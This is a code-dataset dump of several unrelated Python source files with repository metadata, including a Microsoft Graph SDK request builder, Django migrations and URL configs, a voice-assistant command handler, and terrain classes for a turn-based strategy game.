from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ................models.o_data_errors.o_data_error import ODataError
from ................models.term_store.set import Set
class SetRequestBuilder(BaseRequestBuilder):
"""
Provides operations to manage the set property of the microsoft.graph.termStore.relation entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new SetRequestBuilder and sets the default values.
Args:
path_parameters: The raw url or the Url template parameters for the request.
request_adapter: The request adapter to use to execute the requests.
"""
super().__init__(request_adapter, "{+baseurl}/sites/{site%2Did}/termStores/{store%2Did}/groups/{group%2Did}/sets/{set%2Did}/children/{term%2Did}/children/{term%2Did1}/relations/{relation%2Did}/set{?%24select,%24expand}", path_parameters)
async def get(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> Optional[Set]:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[Set]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ................models.o_data_errors.o_data_error import ODataError
error_mapping: Dict[str, ParsableFactory] = {
"4XX": ODataError,
"5XX": ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ................models.term_store.set import Set
return await self.request_adapter.send_async(request_info, Set, error_mapping)
def to_get_request_information(self,request_configuration: Optional[SetRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
The [set] in which the relation is relevant.
Args:
request_configuration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class SetRequestBuilderGetQueryParameters():
"""
The [set] in which the relation is relevant.
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
original_name: The original query parameter name in the class.
Returns: str
"""
if not original_name:
raise TypeError("original_name cannot be null.")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
@dataclass
class SetRequestBuilderGetRequestConfiguration(BaseRequestConfiguration):
from kiota_abstractions.base_request_configuration import BaseRequestConfiguration
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request query parameters
query_parameters: Optional[SetRequestBuilder.SetRequestBuilderGetQueryParameters] = None
|
[
"GraphTooling@service.microsoft.com"
] |
GraphTooling@service.microsoft.com
|
9138de1148cd345ac2d731ad25502eed850fa264
|
2d83d627c446fa84e301f27196f893902066a8a3
|
/smartcity/dbview/migrations/0008_auto_20171030_1950.py
|
8a2f889d476a5e7077de8a008cc9e650156ad104
|
[] |
no_license
|
PoeticIron/ifb299-57lines
|
1e71a79c97a05c0ff7e6c1651469dbd0904385a7
|
837d49437c674daafec805c8f4b1a6c7f595eedf
|
refs/heads/master
| 2021-01-01T18:36:47.580779
| 2017-11-03T05:42:05
| 2017-11-03T05:42:05
| 98,384,561
| 0
| 2
| null | 2017-09-19T07:34:37
| 2017-07-26T05:51:16
|
Python
|
UTF-8
|
Python
| false
| false
| 639
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-30 09:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dbview', '0007_auto_20171030_1947'),
]
operations = [
migrations.AlterField(
model_name='museums',
name='Lat',
field=models.CharField(default='-27.4772', max_length=30),
),
migrations.AlterField(
model_name='museums',
name='Lon',
field=models.CharField(default='153.0278', max_length=30),
),
]
|
[
"nmestone@gmail.com"
] |
nmestone@gmail.com
|
58cbe82bcc8bd6afeed52101fca9d77621105eef
|
4be56098894a95da5964622fc4102b69e4530ab6
|
/题库/1399.页面推荐.py
|
5a140da6d4ab9fa5c70e7d7e978fdf740737d005
|
[] |
no_license
|
ACENDER/LeetCode
|
7c7c7ecc8d0cc52215272f47ec34638637fae7ac
|
3383b09ab1246651b1d7b56ab426a456f56a4ece
|
refs/heads/master
| 2023-03-13T19:19:07.084141
| 2021-03-15T09:29:21
| 2021-03-15T09:29:21
| 299,332,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1399.页面推荐.py
|
[
"1641429327@qq.com"
] |
1641429327@qq.com
|
11e7feb68dc8e7c7d92ddb397418250a2ca1228e
|
eb3cd8723752e34e46728d02d5f95f3e8e7a864d
|
/Django/myvenv/bin/chardetect-3.8
|
d426c822917bb3d16d6de63f05b1eeafdc98791e
|
[] |
no_license
|
AbhisarSaraswat/Projects
|
bdf5b455e6f2480401d646c1115be1a79de6b83d
|
59fe23b803a3d7617b26ecec4259c418704d4cc7
|
refs/heads/master
| 2021-11-17T09:51:32.410418
| 2021-05-21T10:42:31
| 2021-05-21T10:42:31
| 168,728,445
| 0
| 0
| null | 2021-09-22T19:50:09
| 2019-02-01T16:40:42
|
Python
|
UTF-8
|
Python
| false
| false
| 245
|
8
|
#!/home/lucifer/Projects/myvenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"abhisarsaraswat@gmail.com"
] |
abhisarsaraswat@gmail.com
|
f50f22f4257ef2bd4b135c4c4b543869c019f8b8
|
4eeb40dcc265caf4a2b84bc90a28d481930d6a8a
|
/cssproject/cssproject/wsgi.py
|
e87cec6d202682e65310c1cd76e7ac0245d43209
|
[] |
no_license
|
mprasu/Sample-Projects
|
eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d
|
7363baf630900ab2babb4af2afe77911d8a548b2
|
refs/heads/master
| 2020-04-16T06:43:16.345750
| 2019-01-12T07:07:34
| 2019-01-12T07:07:34
| 165,358,055
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
|
[
"muppuriprasanna5@gmail.com"
] |
muppuriprasanna5@gmail.com
|
9ba996ef80069b6979c8495ddbf3ffbab87f533c
|
d0af71157005190c6421b640b0e6cee2f237aace
|
/examples/bamboo/bamboo_plan_directory_info.py
|
9706338f0eb798ba9532324312cadf808092d542
|
[
"Apache-2.0"
] |
permissive
|
atlassian-api/atlassian-python-api
|
d8adeb43ea4c92c10a03f1b53b53b87820f1841d
|
bb1c0f2d4187ba8efa1a838cd0041b54c944fee8
|
refs/heads/master
| 2023-08-29T06:57:22.136461
| 2023-08-27T18:53:00
| 2023-08-27T18:53:00
| 19,530,263
| 1,130
| 679
|
Apache-2.0
| 2023-09-13T19:27:44
| 2014-05-07T10:26:26
|
Python
|
UTF-8
|
Python
| false
| false
| 433
|
py
|
# coding=utf-8
import os
from atlassian import Bamboo
BAMBOO_URL = os.environ.get("BAMBOO_URL", "http://localhost:8085")
ATLASSIAN_USER = os.environ.get("ATLASSIAN_USER", "admin")
ATLASSIAN_PASSWORD = os.environ.get("ATLASSIAN_PASSWORD", "admin")
bamboo = Bamboo(url=BAMBOO_URL, username=ATLASSIAN_USER, password=ATLASSIAN_PASSWORD)
plan_directories_roots = bamboo.plan_directory_info("PROJ-PLAN")
print(plan_directories_roots)
|
[
"noreply@github.com"
] |
noreply@github.com
|
ddbeff68f2104fbd657620867d9acc172c5adecb
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0190_Reverse_Bits/__init__.py
|
13d13496fce71652ff8239e68ab130a72e9cc66e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558
| 2015-06-08T18:05:03
| 2015-06-08T18:05:03
| 27,431,664
| 2
| 1
| null | 2015-06-08T18:05:04
| 2014-12-02T12:31:58
|
Python
|
UTF-8
|
Python
| false
| false
| 656
|
py
|
ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
|
[
"romain_li@163.com"
] |
romain_li@163.com
|
f28ba09e107306b65b13e2ac8683488c3fbf89a0
|
13152e95d8f0fa7c9b9bcb0be368b869b8c34b0f
|
/apps/diary/migrations/0003_auto_20180929_1857.py
|
869839b1cbe31778bbda7881611ab44efa2b9530
|
[] |
no_license
|
Emiyaaaaa/personalweb
|
75872239a963ce59665735a2c9bfff46dc2a671a
|
a4d47dc9a3a5fdf1c3d24d587a177e19b878b661
|
refs/heads/master
| 2021-06-03T09:22:31.201318
| 2020-09-02T07:16:49
| 2020-09-02T07:16:49
| 148,086,883
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
# Generated by Django 2.1.1 on 2018-09-29 18:57
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('diary', '0002_diary_diarycomment'),
]
operations = [
migrations.AlterModelOptions(
name='diarycomment',
options={'verbose_name': '评论', 'verbose_name_plural': '评论'},
),
]
|
[
"2914034404@qq.com"
] |
2914034404@qq.com
|
d8ded25ef10e93c72605b89d85452c69e80636d6
|
9fdc3443090052d31089f8181cfce4d62ca97616
|
/exception_handling_advanced_example61.py
|
aaca7a2d555cedf68e1fb60cee48b451d3e7b846
|
[] |
no_license
|
ahmedyoko/python-course-Elzero
|
9d82b08e81d597292ee85c0d517d8116d0be0905
|
bc11dca9b7ccbccb7c66d6a5b34ded0e6dedc9f8
|
refs/heads/master
| 2023-07-25T19:44:22.073679
| 2021-09-07T19:35:30
| 2021-09-07T19:35:30
| 399,866,512
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,097
|
py
|
#...........................................
# exception_handling_advanced_examples
# try | except | else | finally
#....................................................
the_file = None
the_tries = 5
while the_tries > 0 :
print(f'{the_tries} tries left')
the_tries -= 1
else :
print('All tries are done')
print('*'*50)
the_file = None
the_tries = 5
while the_tries > 0 :
try : # try to open the file
print('enter the file name with the absolute path to open')
print(f'you have {the_tries} tries left')
print('Example => D:\python\file\yourfile.extension')
file_name_and_path = input('file name => : ').strip().lower()
the_file = open(file_name_and_path,'r')
print(the_file.read())
break
except FileNotFoundError:
print('the file not found please be sure the name is valid')
the_tries -= 1
except :
print('error happens')
finally :
if the_file is not None :
the_file.close()
print('the file is closed')
else :
print('All tries are done')
|
[
"aos438479@gmail.com"
] |
aos438479@gmail.com
|
45278734804df48db80172a886fbefcd6bf1b64f
|
dd1462c6dd2aacf13113834854be92b119315722
|
/commands.py
|
ff1f0b7e79f927c5cdb5fd2a885a25572c1fbd0c
|
[] |
no_license
|
voiceassistant-SEDA/Voice-Asistant
|
8d9298f2b5e41c0f14c9d8f31de58df1deca0a93
|
7995875fccde96f4745f4c87fc370d81ac7f61ef
|
refs/heads/main
| 2023-05-05T11:45:07.850369
| 2021-05-21T15:45:33
| 2021-05-21T15:45:33
| 369,581,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,342
|
py
|
import os
import json
import function
import backend
import random
from fuzzywuzzy import process
import Levenshtein as lev
class Commands :
def __init__ (self,function,module,neuralNetwork) :
self.function = function
self.module = module
self.neuralNetwork = neuralNetwork
with open ("./Data/commands.json","r",encoding='utf8' ) as file:
self.commands=json.load (file)
def Run (self,data) :
data=data.lower()
for key in self.commands.keys():
for command in self.commands[key]:
if data in self.commands[key][command]:
return self.Execute( command,key )
#search komutları
words=data.split(" ")
for command in self.commands["search"].keys():
for word in words:
if word in self.commands["search"][command]:
words.remove(word)
search=""
for i in words:
search+=i+" "
return self.Execute(command,"search",search)
"""
#Yapay sinir ağı analizi
i = neuralNetwork.Analyse(data)
if i == 1:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
elif i == 2:
self.Execute2()
else:
data=data.lower()
ratio = 0
command = ""
key=""
for k in self.commands.keys():
for com in self.commands[k]:
highest = process.extractOne(data,com)
if ratio<highest[1]:
ratio=highest[1]
command=highest[0]
key=k
return self.Execute(command,key)
"""
self.module.speak ("Ne dediğini anlayamadım.")
return 1
def Execute (self,command,commandType,search="") :
#conversation
if commandType=="sohbetCumleleri":
if command=="nasilsin":
self.module.speak(random.choice(self.commands["nasilsindonusCumleleri"]["donus"]))
elif command=="tesekkur":
self.module.speak("Rica ederim {}".format(self.function.GetInfo("name")))
elif command=="iyiyim":
self.module.speak("Hep iyi ol :)")
#user update
elif commandType=="update" :
if command=="isimguncelle" :
if self.function.UpdateInfo ("name"):
self.module.speak ("İsmini {} olarak güncelledim".format( self.function.GetInfo ("name")))
elif command=="yasguncelle" :
if self.function.UpdateInfo( "age"):
self.module.speak("Yaşını {} olarak güncelledim.".format(self.function.GetInfo("age")))
elif command=="sehirguncelle":
if self.function.UpdateInfo("hometown","city"):
self.module.speak("Yaşadığın şehri {} olarak güncelledim.".format(self.function.GetInfo("hometown","city")))
elif command=="dogumtarihiguncelle":
if self.function.UpdateInfo("birthdate"):
self.module.speak("Doğum tarihini {} olarak güncelledim.".format(self.function.GetInfo("birthdate")))
elif command=="okulguncelle":
if self.function.UpdateInfo("university","faculty","department"):
self.module.speak("Okul bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("university","faculty","department")))
elif command=="meslekguncelle":
if self.function.UpdateInfo("job"):
self.module.speak( "Meslek bilgilerini {} olarak güncelledim.".format(self.function.GetInfo("job")))
#user info
elif commandType=="getInfo" :
if command=="meslekgetir" :
self.module.speak(self.function.GetInfo ("job"))
if command=="yasgetir":
self.module.speak(self.function.GetInfo("age"))
if command=="sehirgetir":
self.module.speak(self.function.GetInfo("hometown","city"))
if command=="dogumtarihigetir":
self.module.speak(self.function.GetInfo("birthdate"))
if command=="okulbilgisigetir":
self.module.speak(self.function.GetInfo("school","university"))
self.module.speak(self.function.GetInfo("school","faculty"))
self.module.speak(self.function.GetInfo("school","department"))
#asistan info
elif commandType=="asistanInfo" :
if command=="kendinitanit" :
self.module.speak ("Merhabalar benim adım Seda. Ben bir sesli asistanım" )
elif command=="isimsoru" :
self.module.speak ("Benim adım Seda" )
#time functions
elif commandType=="timeFunctions" :
if command=="saatSoru" :
self.module.speak ("Şu an saat "+self.function.Clock() )
elif command=="tarihSoru" :
self.module.speak ("Bugün: "+self.function.Date())
#quick search
elif commandType=="quickSearch":
if command=="havaDurumuSoru":
self.module.speak("İşte bugünkü hava durumu:")
self.function.Search("Hava durumu")
#search
elif commandType=="search":
if command=="webAra":
self.module.speak("İşte senin için bulduklarım: ")
self.function.Search(search)
if command=="musicAra":
self.function.YoutubePlay(search)
#close
elif commandType=="close" :
if command=="kapat" :
self.module.speak ("Görüşmek üzere {}".format (self.function.GetInfo ("name")))
return 0
else:
self.module.speak ("Bir şeyler ters gitti" )
return 0
return 1
|
[
"73945726+sirmakalender@users.noreply.github.com"
] |
73945726+sirmakalender@users.noreply.github.com
|
fd5b3d07a2a0a980e3a2da89214375a9c7a9d6ec
|
1cfb61bb6cee6c8978ad50956d5af36edeb7ee6f
|
/menu/migrations/0007_auto_20161007_1750.py
|
21534b135687d6b66964406bad09b712e06dffb0
|
[] |
no_license
|
greenmails2001/analytics
|
221a2264e8a9db63df9ab57fa6393b1e0df62052
|
cfde53d5402f302e904b96991d67a0c9a210a6c9
|
refs/heads/master
| 2021-01-11T05:43:43.666368
| 2016-10-31T14:45:11
| 2016-10-31T14:45:11
| 71,340,991
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('menu', '0006_auto_20161005_1327'),
]
operations = [
migrations.RenameField(
model_name='file',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='file',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='image',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='image',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menudetail',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='menuheader',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='text',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='text',
old_name='updated',
new_name='updateddate',
),
migrations.RenameField(
model_name='video',
old_name='created',
new_name='createddate',
),
migrations.RenameField(
model_name='video',
old_name='updated',
new_name='updateddate',
),
]
|
[
"greenmails2001@gmail.com"
] |
greenmails2001@gmail.com
|
de075cc155d45012e62fee4fd10dbfd477ea0b69
|
5e0ef0a177306aa205493259cc274be7bb72b9eb
|
/login_and_registration/apps/log_regs_app/urls.py
|
0167a0fd2c5be22b28dbfc5dee64462961a66956
|
[] |
no_license
|
reinib/PythonDjangoCD
|
07654f45e6e339cb3091d66d7bfccb04a46111d1
|
5fef1906a90c997c13a17ef9aec0df30733d5ea8
|
refs/heads/master
| 2020-04-11T10:31:42.034181
| 2018-12-14T01:55:06
| 2018-12-14T01:55:06
| 161,717,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^validate_register$', views.validate_register),
url(r'^users/(?P<id>\d+)$', views.success),
url(r'^validate_login$', views.validate_login),
]
|
[
"brent.reininger89@gmail.com"
] |
brent.reininger89@gmail.com
|
840f45903a811282a9e7105496d723fef512547a
|
743778017a0e775832e45fc05d9a056604f608ad
|
/km71/Guro_Dmytro/4/Task7.py
|
e6d342044e39db64385b0d1b3e66988e2430196c
|
[] |
no_license
|
Kalinia/amis_python71
|
fed5ff37a5909c090a53962daa689141498755b1
|
0123af48b1eaa6d752409b1b643f548c6b0e4ab8
|
refs/heads/master
| 2021-05-07T17:24:21.974699
| 2017-12-21T22:13:00
| 2017-12-21T22:13:00
| 108,726,150
| 0
| 0
| null | 2017-10-29T10:54:14
| 2017-10-29T10:54:14
| null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
while True:
try:
x1 = int(input())
break
except:
print("Please enter number")
while True:
try:
y1=int(input())
break
except:
print("Please enter number")
while True:
try:
x2=int(input())
break
except:
print("Please enter number")
while True:
try:
y2=int(input())
break
except:
print("Please enter number")
if (x1+x2)%2==0 and (y1+y2)%2==0:
print("YES")
elif (x1+x2)%2!=0 and (y1+y2)%2!=0:
print("YES")
else:
print("NO")
|
[
"noreply@github.com"
] |
noreply@github.com
|
5991aa7286b2e0849710359d66a0645c362da72d
|
3b3be533e7fd90a84c54693975dd1809a8814e92
|
/terrains.py
|
4dffc6e4808ac39e3c204805f9124af000578d2e
|
[] |
no_license
|
Fenrir127/advance_wars
|
ed9e91013fb7972d39557551b0a7964a255115a1
|
736eecde986111fa15f452f292201d2abb483a4e
|
refs/heads/main
| 2023-03-27T13:21:32.349864
| 2021-03-26T03:14:57
| 2021-03-26T03:14:57
| 304,418,098
| 0
| 0
| null | 2021-02-20T00:02:20
| 2020-10-15T18:41:44
|
Python
|
UTF-8
|
Python
| false
| false
| 9,912
|
py
|
from os import path
from sprites import *
from setting import *
"""
This contains all the information for the different terrain in the game
Nothing should change in there unless there's a way to change terrain in the game which I don't think there is (except building hp)
"""
# This is the master class Terrain which only serves to pass on the function get_mvt_cost()
class Terrain:
def __init__(self, game):
self.game = game
self.terrain_type = None
self.infantry_mvt_cost = None
self.mech_mvt_cost = None
self.tires_mvt_cost = None
self.tread_mvt_cost = None
self.air_mvt_cost = None
self.ship_mvt_cost = None
self.transport_mvt_cost = None
# This function returns the mvt_cost for one of the 7 mvt_type on a given terrain
def get_mvt_cost(self, type):
if type == INFANTRY:
return self.infantry_mvt_cost
elif type == MECH:
return self.mech_mvt_cost
elif type == TIRES:
return self.tires_mvt_cost
elif type == TREAD:
return self.tread_mvt_cost
elif type == AIR:
return self.air_mvt_cost
elif type == SHIP:
return self.ship_mvt_cost
elif type == TRANSPORT:
return self.transport_mvt_cost
else:
print("get_mvt_cost was given the wrong input:")
print(type)
class Plain(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Plain_sprite(game, x, y)
self.name = "Plain"
self.defense = 1
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 2
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class River(Terrain):
    """Shallow water crossable only on foot (and by air)."""

    def __init__(self, game, x, y):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = River_sprite(game, x, y)
        self.name = "River"
        self.defense = 0
        self.type = LAND
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 2), ("mech", 1), ("tires", 0),
                           ("tread", 0), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
class Wood(Terrain):
    """Forest tile: good cover, slow going for vehicles."""

    def __init__(self, game, x, y):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = Wood_sprite(game, x, y)
        self.name = "Wood"
        self.defense = 2
        self.type = LAND
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 1), ("mech", 1), ("tires", 3),
                           ("tread", 2), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
class Mountain(Terrain):
    """High ground: best land defense, foot/air traffic only."""

    def __init__(self, game, x, y):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = Mountain_sprite(game, x, y)
        self.name = "Mountain"
        self.defense = 4
        self.type = LAND
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 2), ("mech", 1), ("tires", 0),
                           ("tread", 0), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
class Sea(Terrain):
    """Open water: naval and air traffic only."""

    def __init__(self, game, x, y):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = Sea_sprite(game, x, y)
        self.name = "Sea"
        self.defense = 0
        self.type = WATER
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 0), ("mech", 0), ("tires", 0),
                           ("tread", 0), ("air", 1), ("ship", 1),
                           ("transport", 1)):
            setattr(self, kind + "_mvt_cost", cost)
class Beach(Terrain):
    """Shoreline tile: land units may cross it and transports can dock."""

    def __init__(self, game, x, y):
        super().__init__(game)  # the super init doesn't really do anything for now
        self.sprite = Beach_sprite(game, x, y)
        # Bug fix: this tile reported itself as "Sea" — a copy-paste from the
        # Sea class above; it is the beach tile.
        self.name = "Beach"
        self.defense = 0
        # NOTE(review): typed WATER even though land units can enter —
        # presumably so transports can load/unload here; confirm.
        self.type = WATER
        # every terrain class must define the mvt cost for all movement types
        # when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
        self.infantry_mvt_cost = 1
        self.mech_mvt_cost = 1
        self.tires_mvt_cost = 2
        self.tread_mvt_cost = 1
        self.air_mvt_cost = 1
        self.ship_mvt_cost = 0
        self.transport_mvt_cost = 1
class Road(Terrain):
    """Paved tile: uniformly cheap for every land unit, no cover."""

    def __init__(self, game, x, y):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = Road_sprite(game, x, y)
        self.name = "Road"
        self.defense = 0
        self.type = LAND
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 1), ("mech", 1), ("tires", 1),
                           ("tread", 1), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
class City(Terrain):
    """Capturable building that pays its owner funds each turn."""

    def __init__(self, game, x, y, owner):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = City_sprite(game, x, y, owner)
        self.name = "City"
        self.defense = 3
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20  # capture points left before the building changes hands
        self.x = x
        self.y = y
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 1), ("mech", 1), ("tires", 1),
                           ("tread", 1), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
        self.owner = owner
        if owner is not None:
            # Neutral cities have no player roster to register with.
            self.owner.buildings.append(self)

    def add_funds(self):
        # Flat per-turn income for every owned building.
        self.owner.funds += 1000

    def new_owner(self, player):
        """Transfer the city to `player`, swapping the sprite colour."""
        self.owner.buildings.remove(self)
        self.sprite.kill()
        self.sprite = City_sprite(self.game, self.x, self.y, player)
        self.owner = player
        self.owner.buildings.append(self)
class Factory(Terrain):
    """Capturable production building; also pays out funds each turn."""

    def __init__(self, game, x, y, owner):
        super().__init__(game)  # the super init doesn't really do anything for now
        self.sprite = Factory_sprite(game, x, y, owner)
        # NOTE(review): lowercase "factory" is inconsistent with the other
        # terrain names ("City", "Road", ...); left unchanged in case UI or
        # lookups compare against the exact string.
        self.name = "factory"
        self.defense = 3
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20  # capture points left before the building changes hands
        self.x = x
        self.y = y
        # every terrain class must define the mvt cost for all movement types
        # when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
        self.infantry_mvt_cost = 1
        self.mech_mvt_cost = 1
        self.tires_mvt_cost = 1
        self.tread_mvt_cost = 1
        self.air_mvt_cost = 1
        self.ship_mvt_cost = 0
        self.transport_mvt_cost = 0
        self.owner = owner
        if owner is not None:
            self.owner.buildings.append(self)

    def add_funds(self):
        # Flat per-turn income for every owned building.
        self.owner.funds += 1000

    def new_owner(self, player):
        """Transfer the factory to `player`, swapping the sprite colour."""
        self.owner.buildings.remove(self)
        self.sprite.kill()
        # Bug fix: a captured factory used to respawn with a City_sprite
        # (copy-paste from City.new_owner); use the factory sprite so the
        # tile keeps looking — and presumably behaving — like a factory.
        self.sprite = Factory_sprite(self.game, self.x, self.y, player)
        self.owner = player
        self.owner.buildings.append(self)
class HQ(Terrain):
    """Headquarters building: capturing it ends the game."""

    def __init__(self, game, x, y, owner):
        super().__init__(game)  # base init only zeroes the shared fields
        self.sprite = Hq_sprite(game, x, y, owner)
        self.name = "HQ"
        self.defense = 4
        self.type = BUILDING
        self.building_type = LAND
        self.hp = 20  # capture points left before the HQ falls
        self.x = x
        self.y = y
        # Per-movement-class cost; 0 marks the tile impassable for that class.
        for kind, cost in (("infantry", 1), ("mech", 1), ("tires", 1),
                           ("tread", 1), ("air", 1), ("ship", 0),
                           ("transport", 0)):
            setattr(self, kind + "_mvt_cost", cost)
        self.owner = owner
        if owner is not None:
            self.owner.buildings.append(self)

    def add_funds(self):
        # The HQ pays out like any other building.
        self.owner.funds += 1000

    def new_owner(self, player):
        """Capturing the HQ ends the match immediately."""
        print("You win the game!")
        self.game.preview_text.text = ""
        self.game.preview_text.text = "You win the game!!!"
        self.game.draw()
        exit()
|
[
"noreply@github.com"
] |
noreply@github.com
|
92ec94b88e74f9385c3753e035a3676a25f2ecc7
|
6e5c2ba6cd380af56d7714cd6b3ec31b0e0d947e
|
/src/error_single.py
|
082454e4f3df909b97bfed7a7eed20a83a2d8748
|
[] |
no_license
|
luedu/Bokeh-Effect
|
74a0d2b2800a458da9983d377418542bf40d409c
|
f985dd366918f35de92ec118ca0b4783812ad4d6
|
refs/heads/master
| 2022-04-17T12:32:54.975888
| 2020-04-19T14:10:54
| 2020-04-19T14:10:54
| 257,001,932
| 0
| 0
| null | 2020-04-19T13:08:40
| 2020-04-19T13:08:40
| null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
import torch
import cv2
import sys
from utils import dice_coeff,dice_loss,normalization,denormalize,ab_rel_diff,sq_rel_diff,rms_linear
import numpy as np
def set_requires_grad(nets, requires_grad=False):
    """Toggle gradient tracking on every parameter of the given network(s).

    `nets` may be a single network or a list of networks; None entries
    are skipped.
    """
    candidates = nets if isinstance(nets, list) else [nets]
    for candidate in candidates:
        if candidate is None:
            continue
        for param in candidate.parameters():
            param.requires_grad = requires_grad
